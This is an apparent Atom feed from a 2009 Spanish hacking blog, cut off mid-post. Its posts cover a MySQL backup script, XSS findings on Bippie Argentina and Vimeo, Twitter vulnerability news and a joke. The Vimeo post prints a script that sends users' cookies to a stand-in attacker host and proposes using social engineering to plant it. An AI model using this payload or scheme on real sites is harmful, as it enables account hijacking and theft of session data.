<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6014016604825873236</id><updated>2011-07-08T13:51:26.588+02:00</updated><category term='Blackhat'/><category term='vulnerabilidades'/><category term='democracia'/><category term='javascript'/><category term='twwite'/><category term='bugs'/><category term='ing. social'/><category term='SBD'/><category term='fuerza bruta'/><category term='pobre'/><category term='hacking'/><category term='kon-boot'/><category term='openoffice'/><category term='S.O'/><category term='ladrones'/><category term='shell'/><category term='python'/><category term='web 2.0'/><category term='JcF'/><category term='bach'/><category term='sun'/><category term='script'/><category term='quinceañeros'/><category term='windows'/><category term='fotolog'/><category term='xss'/><category term='estadisticas'/><category term='dos'/><category term='ciberguerra'/><category term='cronos'/><category term='smf'/><category term='chiste'/><category term='espartanos'/><category term='backup'/><category term='boot'/><category term='mysql'/><category term='cookies'/><category term='ragnarok'/><category term='dork'/><category term='dorks'/><category term='Su Do Scam'/><category term='abril negro'/><category term='juankeo'/><category term='meneame'/><category term='putada'/><category term='geek'/><category term='moncloa'/><category term='facil'/><category term='EE.UU.'/><category term='vimeo'/><category term='bippie'/><category term='kylin'/><category term='twitter'/><category term='sabio'/><category term='fix'/><category term='china'/><category term='ubuntu'/><category term='tuenti'/><category term='pruebas'/><category term='google'/><title type='text'>Jugando con Fósforos</title><subtitle type='html'>Prohibido....</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>20</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-8002046208039216186</id><published>2009-12-07T12:47:00.002+01:00</published><updated>2009-12-07T13:04:47.793+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cronos'/><category scheme='http://www.blogger.com/atom/ns#' term='backup'/><category scheme='http://www.blogger.com/atom/ns#' term='ragnarok'/><category scheme='http://www.blogger.com/atom/ns#' term='bach'/><title type='text'>Sistema de backup Cronos por Mail(Ragnarok y demas Mmorpgs)</title><content type='html'>&lt;span class="bbc_size"  style="font-size:6;"&gt;&lt;span class="bbc_color"  style="color:maroon;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:100%;"&gt;Como prometi ya hace tiempo, aqui teneis un script bash para hacer backups de modo facil.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="bbc_color"  style="color:maroon;"&gt;&lt;br /&gt;&lt;br /&gt;[FAQ] Backups de tu base de datos comprimidos por mail&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="bbc_size"  style="font-size:180%;"&gt;&lt;b&gt;&lt;span class="bbc_color"  style="color:brown;"&gt;Autor: Jubjub&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;Código: &lt;a href="javascript:void(0);" onclick="return smfSelectText(this);" class="codeoperation"&gt;[Seleccionar]&lt;/a&gt;&lt;/div&gt;&lt;code&gt;mysqldump --user=root --password=AQUITIENESQUEPONERTUPASSWORD $1 &amp;gt;  ${1}.sql&lt;br /&gt;FECHA=`date +%d-%m`&lt;br /&gt;zip ${FECHA}_${1}_dump.zip ${1}.sql&lt;br /&gt;rm -f *.sql&lt;br /&gt;mutt -s "Backup Servidor ${FECHA}" -a *.zip $2 &amp;lt; mes.txt&lt;br /&gt;rm -f *.zip&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="bbc_size"  style="font-size:130%;"&gt;&lt;span class="bbc_color"  style="color:maroon;"&gt;1.-Instalacion&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Cread un archivo en vuestro dedicado linux, introducid el texto anterior en el, sustituyen la password de root mysql donde indica, dadle permisos con el comando&lt;br /&gt;&lt;div class="quoteheader"&gt;Citar&lt;/div&gt;&lt;blockquote&gt;chmod 700 nombrearchivo&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Una vez hecho esto, cread un archivo llamado &lt;b&gt;mes.txt&lt;/b&gt;, y introducid en el el texto que acompañara al backup en vuestro mail.&lt;br /&gt;y estara listo para su uso :D&lt;br /&gt;&lt;br /&gt;&lt;span class="bbc_size"  style="font-size:130%;"&gt;&lt;b&gt;&lt;span class="bbc_color"  style="color:maroon;"&gt;&lt;br /&gt;2.-Forma de uso&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Para utilizarlo, teneis que utilizar el comando, estando en la carpeta donde guardasteis el script:&lt;br /&gt;&lt;div class="codeheader"&gt;Código: &lt;a href="javascript:void(0);" onclick="return smfSelectText(this);" class="codeoperation"&gt;[Seleccionar]&lt;/a&gt;&lt;/div&gt;&lt;code&gt;./nombrescript nombrebasededatos email&lt;br /&gt;&lt;/code&gt;Y recibireis en vuestro mail el archivo sql de la base de datos comprimido en zip. Podeis automatizarlo para tener backups seghuros que no perdereis en caso de fallo en el dedicado!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-8002046208039216186?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/8002046208039216186/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/12/sistema-de-backup-cronos-por.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/8002046208039216186'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/8002046208039216186'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/12/sistema-de-backup-cronos-por.html' title='Sistema de backup Cronos por Mail(Ragnarok y demas Mmorpgs)'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-317177810876500526</id><published>2009-10-13T20:33:00.009+02:00</published><updated>2009-10-13T20:51:56.939+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilidades'/><category scheme='http://www.blogger.com/atom/ns#' term='cookies'/><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='bippie'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><title type='text'>Bippie Argentina: XSS Pwned</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 308px; height: 245px;" alt="http://www.rainbowgrabaciones.com.ar/logos-bippie.png" src="http://www.rainbowgrabaciones.com.ar/logos-bippie.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Ante todo gracias a &lt;a style="font-weight: bold;" href="http://foro.elhacker.net/profiles/skeletron-u338568.html"&gt;Skeletron&lt;/a&gt;, de ElHacker.net, por avisarme de este garrafal fallo&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vamos a revisar &lt;span style="font-weight: bold;"&gt;uno de los fallos &lt;/span&gt;que presenta esta &lt;span style="font-style: italic;"&gt;conocida &lt;/span&gt;web &lt;img src="http://foro.elhacker.net/Smileys/cowboy/grin.gif" alt=";D" title=";D" align="bottom" /&gt; (si fallan a este nivel, no hay duda de que también tendrán SQLi, dejo la tarea a investigar al que le interese &lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" title=":P" align="bottom" /&gt; )&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;http://ar.bippie.com/modules/catalog/prodinfo.php?categoria=%3C/title%3E%3Cscript%3Ealert%20%28%22Jugando%20con%20Fosforos%22%29;%3C/script%3E&amp;amp;sub_categoria=rock+nacional&amp;amp;nombre=solotelscompatibles&amp;amp;sbrand=5&amp;amp;smodel=8%2F826#4130952372793495685&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_-dOA210g16k/StTKtFo7GsI/AAAAAAAAACk/pFWlUCIDKRg/s1600-h/xss.PNG"&gt;&lt;img style="cursor: pointer; width: 326px; height: 124px;" src="http://2.bp.blogspot.com/_-dOA210g16k/StTKtFo7GsI/AAAAAAAAACk/pFWlUCIDKRg/s400/xss.PNG" alt="" id="BLOGGER_PHOTO_ID_5392157529826073282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 153, 102); font-weight: bold;"&gt;Simplisimo!&lt;/span&gt;, solo tenemos que escaparnos de la etiqueta &lt;span style="font-weight: bold;"&gt;&lt;&gt;&lt;/span&gt;, y a inyectar html se ha dicho &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Por esto, es por lo que debeis de recordar siempre, que al mostrar texto que es proporcionado por el cliente, hay que colocar un &lt;span style="font-weight: bold;"&gt;htmlspecialchars().&lt;/span&gt;  &lt;img src="http://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" title=":rolleyes:" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Un saludo, y hasta la próxima!&lt;br /&gt;&lt;br /&gt;PD: He tenido que colocar la url codificada poraque me causaba a mi mismo un &lt;span style="font-weight: bold;"&gt;XSS  &lt;/span&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/carita.gif" alt=":¬¬" title=":¬¬" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-317177810876500526?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/317177810876500526/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/10/bippie-argentina-xss-pwned.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/317177810876500526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/317177810876500526'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/10/bippie-argentina-xss-pwned.html' title='Bippie Argentina: XSS Pwned'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_-dOA210g16k/StTKtFo7GsI/AAAAAAAAACk/pFWlUCIDKRg/s72-c/xss.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-6605809288328536241</id><published>2009-06-21T12:07:00.010+02:00</published><updated>2009-06-21T12:31:46.765+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='cookies'/><category scheme='http://www.blogger.com/atom/ns#' term='vimeo'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><title type='text'>XSS + Robo de Cookies en Vimeo</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 323px; height: 238px;" alt="http://www.davedixon.org/file.php/1/vimeo.jpg" src="http://www.davedixon.org/file.php/1/vimeo.jpg" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Mientras comprobaba esa leyenda urbana de que &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Vimeo &lt;/span&gt;es mejor que &lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;Youtube&lt;/span&gt;, encontré un &lt;span style="font-weight: bold;"&gt;XSS&lt;/span&gt;, que aunque tiene una &lt;span style="font-style: italic;"&gt;cierta dificultad de explotar&lt;/span&gt;, puede ser interesante de investigar.&lt;br /&gt;&lt;br /&gt;El fallo en cuestión se encuentra en la &lt;span style="font-weight: bold;"&gt;opción de añadir créditos&lt;/span&gt;, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;La parte interesante es que esto &lt;span style="font-weight: bold;"&gt;es una llamada AJAX&lt;/span&gt;, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://i39.tinypic.com/eqwi9u.jpg"&gt;&lt;img style="width: 240px; height: 173px;" alt="http://i39.tinypic.com/eqwi9u.jpg" src="http://i39.tinypic.com/eqwi9u.jpg" /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;Haz click para ver la imagen a tamaño completo&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Aquí podemos ver un &lt;span style="font-weight: bold;"&gt;XSS inofensivo&lt;/span&gt;, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;&gt;document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;&lt; /script &gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;El código del &lt;span style="font-weight: bold;"&gt;PHP &lt;/span&gt;simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;br /&gt;Aun así, al &lt;span style="font-weight: bold;"&gt;no haber un método directo &lt;/span&gt;(o no descubierto) de hacer esto, como puede ser en los &lt;span style="font-weight: bold;"&gt;XSS por link&lt;/span&gt;, habría que hacer un poco de uso de &lt;span style="font-weight: bold;"&gt;ingeniería social&lt;/span&gt;, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el  &lt;span style="font-style: italic;"&gt;"código del vídeo"&lt;/span&gt;, que no seria mas que nuestro &lt;span style="font-weight: bold;"&gt;XSS&lt;/span&gt;. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/grin.gif" alt=";D" title=";D" align="bottom" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-6605809288328536241?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/6605809288328536241/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/06/xss-robo-de-cookies-en-vimeo.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/6605809288328536241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/6605809288328536241'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/06/xss-robo-de-cookies-en-vimeo.html' title='XSS + Robo de Cookies en Vimeo'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i39.tinypic.com/eqwi9u_th.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-8026078774635369069</id><published>2009-06-17T08:21:00.005+02:00</published><updated>2009-06-21T11:59:10.705+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilidades'/><category scheme='http://www.blogger.com/atom/ns#' term='web 2.0'/><category scheme='http://www.blogger.com/atom/ns#' term='twwite'/><title type='text'>TwitPwn: Desarrolladores sin vacaciones</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="cursor: -moz-zoom-in; width: 255px; height: 258px;" alt="http://composta.net/diosameba/wp-content/uploads/2009/04/la-ballena-twitter.jpg" src="http://composta.net/diosameba/wp-content/uploads/2009/04/la-ballena-twitter.jpg" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Parece que la fiebre del &lt;span style="color: rgb(51, 204, 255); font-weight: bold;"&gt;Twitter &lt;/span&gt;les va a dar a algunos dolores de cabeza: &lt;span style="font-weight: bold;"&gt;Aviv Raff&lt;/span&gt;, que ya participo en "El mes de las vulnerabilidades en los navegadores", evento que se llevo a cabo con éxito, ha anunciado en &lt;a href="http://twitpwn.com/"&gt;TwitPwn&lt;/a&gt; que juli sera el &lt;span style="font-style: italic;"&gt;"Mes de las vulnerabilidades Twitter"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Planea lanzar una al dia, la mayoia relacionadas con la API de Twitter, y aplicaciones de terceros. Al menos avisará a los desarrolladores con &lt;span style="font-weight: bold;"&gt;24 horas de antelacion&lt;/span&gt;, ya que segun el, "las vunerabilidades podrian ser utilizadas para crear un worm-Twitter"&lt;br /&gt;&lt;br /&gt;Asi que me temo que los desarolladores afectados van a pasar un mes &lt;span style="font-style: italic;"&gt;movidito &lt;/span&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" title=":rolleyes:" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Me entere de esto via &lt;a href="http://www.securitybydefault.com/"&gt;SbD&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-8026078774635369069?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/8026078774635369069/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/06/twitpwn-desarrolladores-sin-vacaciones.html#comment-form' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/8026078774635369069'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/8026078774635369069'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/06/twitpwn-desarrolladores-sin-vacaciones.html' title='TwitPwn: Desarrolladores sin vacaciones'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-4237972066482524315</id><published>2009-05-25T21:57:00.003+02:00</published><updated>2009-05-25T22:50:21.101+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='meneame'/><category scheme='http://www.blogger.com/atom/ns#' term='dos'/><category scheme='http://www.blogger.com/atom/ns#' term='pruebas'/><title type='text'>¿Puede el efecto Meneame causar un dDOs?</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img alt="http://www.abadiadigital.com/imagenes/logo-meneame.png" src="http://www.abadiadigital.com/imagenes/logo-meneame.png" /&gt;&lt;br /&gt;&lt;/div&gt;Quizas alguien se &lt;span style="font-weight: bold;"&gt;pregunte&lt;/span&gt; que es el &lt;span style="font-style: italic;"&gt;efecto meneame&lt;/span&gt;, o incluso que es &lt;a href="http://meneame.com/"&gt;meneame&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://meneame.com/"&gt;Meneame&lt;/a&gt; es una pagina de noticias, puedes votar las que mas te gusten, quitar puntos a las que te parezcan irrelevantes, etc. Todo muy 2.0.&lt;br /&gt;&lt;br /&gt;Mucho se ha hablado sobre el efecto meneame: oleadas de personas que llegan a tu pagina cuando un texto de tu web llega a la portada de meneame.&lt;br /&gt;&lt;br /&gt;En una  prueba realizada por mi consegui &lt;span style="font-weight: bold;"&gt;mas de 200 visitas&lt;/span&gt; en apenas 3 minutos (&lt;img src="http://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" title=":rolleyes:" align="bottom" /&gt;) con tan solo 3 meneos (lo normal son del millar hacia arriba para llegar a portada, vamos, que no pude experimentar ni una milesima parte del efecto meneame).&lt;br /&gt;&lt;br /&gt;Mucho se ha hablado de que hay que tener tu web en un servidor potente si quieres soportar los picos de un efecto meneame... tu web se ralentiza, empieza a fallar si tu host no es potente.. un caos.&lt;br /&gt;&lt;br /&gt;Pero.. es esto mito o realidad? Hay gente que realmente piensa que puede causar el efecto de un &lt;span style="font-weight: bold;"&gt;dDOs&lt;/span&gt; sobre tu web.. ¡&lt;u&gt;y aqui estamos para comprobarlo&lt;/u&gt;! &lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Este próximo sabado, &lt;span style="font-weight: bold;"&gt;dia 30 de mayo&lt;/span&gt;, levantare un servidor en un servidor casero, enviare una noticia a meneame e intentaremos entre todos que llegue a portada, para comprobar si se sufre un retardo en la web, o incluso si cae. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;&lt;br /&gt;Asi que cuanta mas &lt;span style="font-weight: bold;"&gt;difusion le deis a este post&lt;/span&gt;, mejor sera, y mas lo agradecere yo&lt;br /&gt;&lt;br /&gt;Ya ansioso por que llegue la hora de la prueba me despido.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-4237972066482524315?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/4237972066482524315/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/puede-el-efecto-meneame-causar-un-ddos.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/4237972066482524315'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/4237972066482524315'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/puede-el-efecto-meneame-causar-un-ddos.html' title='¿Puede el efecto Meneame causar un dDOs?'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-3690587119453338907</id><published>2009-05-24T21:21:00.004+02:00</published><updated>2009-05-24T21:22:48.073+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='chiste'/><category scheme='http://www.blogger.com/atom/ns#' term='geek'/><title type='text'>El chiste mas friki de la historia</title><content type='html'>&lt;blockquote style="font-weight: bold;"&gt;- ¿Por qué los programadores americanos confunden el dia de Navidad  con Halloween?&lt;br /&gt;- Porque DEC 25 = OCT 31&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿Lo entendiste a la primera?  Si? Mala cosa &lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" title=":P" align="bottom" /&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-3690587119453338907?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/3690587119453338907/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/el-chiste-mas-friki-de-la-historia.html#comment-form' title='5 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/3690587119453338907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/3690587119453338907'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/el-chiste-mas-friki-de-la-historia.html' title='El chiste mas friki de la historia'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1404187447939119952</id><published>2009-05-20T23:42:00.004+02:00</published><updated>2009-05-21T15:43:06.399+02:00</updated><title type='text'>Una pequeña perla: IntelliSense</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 269px; height: 332px;" alt="http://www.larepublica.com.uy/publicaciones/101/20060421/images/contratapa17pronta.gif" src="http://www.larepublica.com.uy/publicaciones/101/20060421/images/contratapa17pronta.gif" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Revisando los proyectos que se estan presentando en &lt;a href="http://foro.elhacker.net/"&gt;elhacker.net&lt;/a&gt; para el evento "Abril Negro", encontre esta pequeña joya en C# que me hizo recordar un proyecto que siempre quise hacer..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;pero que nunca encontre un momento adecuado. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/cry.gif" alt=":-(" title=":-(" align="bottom" /&gt;&lt;span style="display: block;" id="formatbar_Buttons"&gt;&lt;span class="on down" style="display: block;" id="formatbar_CreateLink" title="Enlace" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 8);ButtonMouseDown(this);"&gt;&lt;img src="http://www.blogger.com/img/blank.gif" alt="Enlace" class="gl_link" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Cito textualmente de su autor, &lt;span style="font-weight: bold; font-style: italic; color: rgb(51, 51, 153);"&gt;43H4FH44H45H4CH49H56H45H &lt;/span&gt;&lt;span style="color: rgb(51, 51, 153);"&gt;&lt;a href="http://foro.elhacker.net/analisis_y_diseno_de_malware/intellisense_control_via_web_robo_de_informacion-t255155.0.html"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;(Link 